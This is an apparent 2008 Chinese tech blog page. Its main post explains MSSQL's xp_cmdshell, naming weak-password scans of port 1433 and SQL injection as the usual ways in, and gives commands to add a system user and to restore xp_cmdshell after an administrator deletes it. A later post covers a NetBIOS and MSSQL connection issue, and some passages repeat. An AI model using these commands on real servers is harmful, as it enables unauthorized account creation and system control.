什么是XP_CMDShell
作者:admin 日期:2008-08-23
XP_CMDShell是MSSQl的扩展存储过程,调用此存储过程可以直接使用操作系统的shell所以这个扩展存储过程在扫描到1433弱口令或注入时经常用来执行系统命令
格式为: exec master ..xp_cmdshell'net user 用户名 密码 /add'
当管理员删除XP_CMDShell时=============================
输入Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回1的话就说明回复成功
格式为: exec master ..xp_cmdshell'net user 用户名 密码 /add'
当管理员删除XP_CMDShell时=============================
输入Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回1的话就说明回复成功
远古死亡之花
作者:admin 日期:2008-08-22
如何使用代理上网
作者:admin 日期:2008-08-21
防止ARP攻击的简单方法
作者:admin 日期:2008-08-10
asp错误8007000e处理方法
作者:admin 日期:2008-08-08
交换机端口查询以及流量控制
作者:admin 日期:2008-08-06
北京联通/移动gprs收费情况
作者:admin 日期:2008-08-06
删除不能删除得文件夹或文件
作者:admin 日期:2008-08-05
Provider 错误 '80004005' 未指定的错误
作者:admin 日期:2008-08-05
黑客入侵各个端口的方法
作者:admin 日期:2008-08-01
域名状态及其意义总结
作者:admin 日期:2008-07-29
网络上最常用10个密码
作者:admin 日期:2008-07-26
在局域网用计算机名可以连计算机的MSSQl,用IP不可以
作者:admin 日期:2008-07-25
大家好!也就是无意间,我休假得时候,无聊拿起前些日子没做完得系统修改,发现在局域网中,连接MSSQL数据库得时候,用机器名可以连接,用IP不行,后来也是凑巧,我打开了:
网上邻居--右键--属性--本地连接--右键--属性--Internet协议(Tcp/IP)--属性--高级--WINS--启用TCP/IP上得NetBIos--确定(我曾经为了关闭137,138,139三个端口而关闭了这个协议)。此时在拿自己做的软件,用IP连接MSSQL,结果可以了,百思不得其解,后来我放假得弟弟回来在微软得网站找到了说明:
http://support.microsoft.com/?scid=kb%3Bzh-cn%3B258771&x=10&y=14
证实了在局域网中,NetBIos有负责把虚拟IP解释成为计算机名的作用。
网上邻居--右键--属性--本地连接--右键--属性--Internet协议(Tcp/IP)--属性--高级--WINS--启用TCP/IP上得NetBIos--确定(我曾经为了关闭137,138,139三个端口而关闭了这个协议)。此时在拿自己做的软件,用IP连接MSSQL,结果可以了,百思不得其解,后来我放假得弟弟回来在微软得网站找到了说明:
http://support.microsoft.com/?scid=kb%3Bzh-cn%3B258771&x=10&y=14
证实了在局域网中,NetBIos有负责把虚拟IP解释成为计算机名的作用。
